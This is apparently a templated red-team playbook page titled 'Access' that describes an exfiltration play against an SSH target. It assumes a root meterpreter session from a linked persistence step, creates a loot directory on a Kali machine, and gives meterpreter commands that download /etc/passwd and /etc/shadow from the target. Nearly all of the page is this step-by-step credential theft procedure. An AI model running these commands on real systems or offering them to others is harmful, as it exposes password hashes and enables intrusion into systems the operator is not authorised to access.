# Access

[TOC]

## Vars

| Variable | Value      | Description |
| -------- | ---------- | ----------- |
| TARGET   | {{TARGET}} | The target running SSH |

## Description

Example play showing exfiltration.

## Steps

### Prereqs

Use the `root` meterpreter session from [persist](persist.md)

### File Organization

Organize files on your Kali system

```bash
mkdir -p /opt/rtfm/loot/{{TARGET}}/etc
```

### Download Files

Use the root meterpreter session to exfiltrate files over HTTPs.

```bash
download /etc/passwd /opt/rtfm/loot/{{TARGET}}/etc/
download /etc/shadow /opt/rtfm/loot/{{TARGET}}/etc/
```
